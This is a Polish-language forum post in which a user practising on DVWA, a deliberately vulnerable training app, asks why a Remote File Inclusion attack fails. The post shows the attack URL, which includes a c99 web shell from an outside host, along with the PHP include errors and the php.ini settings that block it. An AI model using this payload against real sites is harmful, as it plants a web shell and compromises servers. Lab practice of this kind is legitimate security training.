bagsiu
Użytkownik
- Dołączył
- Wrzesień 16, 2009
- Posty
- 35
Witam.
Mam problem z bugiem RFI.
Atak ćwicze lokalnie na stronie podatnej na ataki (DVWA).
Po dołączeniu do Url'a linka do shella(htttp://localhost/dvwa/vulnerabilities/fi/?page=http://c99shell.hut2.ru/c99.txt?) wywala takie errory :
w pliku php.ini mam tak ustawione :
A mój serwer lokalny to xampp.
Z góry dzięki za pomoc.
Mam problem z bugiem RFI.
Atak ćwicze lokalnie na stronie podatnej na ataki (DVWA).
Po dołączeniu do Url'a linka do shella(htttp://localhost/dvwa/vulnerabilities/fi/?page=http://c99shell.hut2.ru/c99.txt?) wywala takie errory :
Kod:
Warning: include() [function.include]: ht tp:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35
Warning: include(http://c99shell.hut2.ru/c99.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35
Warning: include() [function.include]: Failed opening 'http://c99shell.hut2.ru/c99.txt' for inclusion (include_path='.;\xampp\php\PEAR;../../external/phpids/0.6/lib/') in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35
Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 243
Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 244
Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 245
w pliku php.ini mam tak ustawione :
Kod:
; This file attempts to overwrite the original php.ini file. Doesnt always work.
magic_quotes_gpc = Off
allow_url_fopen = on
allow_url_include = Off
Z góry dzięki za pomoc.
Ostatnia edycja: